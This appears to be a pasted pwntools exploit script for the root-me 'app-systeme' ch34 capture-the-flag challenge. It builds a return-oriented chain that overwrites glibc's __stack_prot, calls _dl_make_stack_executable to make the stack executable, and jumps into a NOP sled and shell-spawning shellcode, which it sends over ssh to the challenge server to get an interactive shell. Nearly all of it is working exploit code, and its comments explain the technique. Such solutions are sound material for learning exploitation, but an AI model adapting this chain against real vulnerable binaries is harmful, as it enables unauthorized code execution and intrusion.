Untitled

a guest
Jan 29th, 2019
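from pwn import *

# Walkthrough script for the root-me "app-systeme" challenge ch34 (amd64).
#
# The ROP chain does not fight NX head-on: it writes a protection value into
# glibc's ``__stack_prot``, calls ``_dl_make_stack_executable`` so the loader
# re-protects the stack mapping, and then ``call rsp`` lands in the NOP sled
# and shellcode appended to the payload.  Everything is looked up in the
# binary's own symbol table, so the chain presupposes that ``__stack_prot``,
# ``__libc_stack_end`` and ``_dl_make_stack_executable`` are resolvable at
# fixed addresses.  NOTE(review): the binary's actual protections are not
# visible from this script; ``checksec`` on ch34 is the way to confirm which
# of PIE/ASLR, a stack canary, or a stripped symbol table would break it.

context.arch = "amd64"

# Bytes of padding needed to reach the saved return address.  280 is the
# value from the original script and is specific to this binary's frame
# layout; it is not derived here.
OFFSET = 280


def _gadget(elf, code):
    """Return the address of the first occurrence of assembled *code* in *elf*.

    Args:
        elf: the ``pwnlib.elf.ELF`` to search.
        code: assembly text for the gadget, e.g. ``'pop rcx; ret;'``.

    Raises:
        ValueError: when the gadget is absent.  ``next()`` on an exhausted
            ``elf.search`` would otherwise surface as a bare ``StopIteration``
            that does not say which gadget was missing.
    """
    address = next(elf.search(asm(code)), None)
    if address is None:
        raise ValueError("gadget not found: %r" % code)
    return address


elf = ELF("ch34")
rop = ROP(elf)

# Stage 1: the equivalent of ``mov qword [__stack_prot], 7`` built from three
# gadgets (load rcx, load rdx, store).  7 is the value the original author
# chose; it matches PROT_READ|PROT_WRITE|PROT_EXEC in Linux's <sys/mman.h>.
rop.raw(_gadget(elf, 'pop rcx; ret;'))
rop.raw(7)
rop.raw(_gadget(elf, 'pop rdx; ret;'))
rop.raw(elf.symbols['__stack_prot'])
rop.raw(_gadget(elf, 'mov [rdx], rcx; ret;'))

# Stage 2: have the loader apply ``__stack_prot`` to the stack mapping that
# contains ``__libc_stack_end``, then pivot execution onto the stack itself.
rop.call('_dl_make_stack_executable', [elf.symbols['__libc_stack_end']])
rop.raw(_gadget(elf, 'call rsp'))

print(rop.dump())

# ``rop.chain()`` and the ``b''`` literals keep every piece of the payload as
# bytes, which is the same object type on Python 2 and also works on Python 3.
# The original ``"A"*280 + str(rop) + "\x90"*128 + asm(...)`` mixed ``str``
# with the ``bytes`` returned by ``asm()`` and raises ``TypeError`` on
# Python 3 pwntools.
payload = b"A" * OFFSET + rop.chain() + b"\x90" * 128 + asm(shellcraft.sh())

# Login details are the ones given in the original script for this challenge.
# The ssh session and the remote process are closed explicitly once the
# interactive session ends; the original left both open.
s = ssh(host='challenge03.root-me.org', port=2223,
        user='app-systeme-ch34', password='app-systeme-ch34')
try:
    p = s.process(['./ch34'])
    try:
        p.sendline(payload)
        p.interactive()
    finally:
        p.close()
finally:
    s.close()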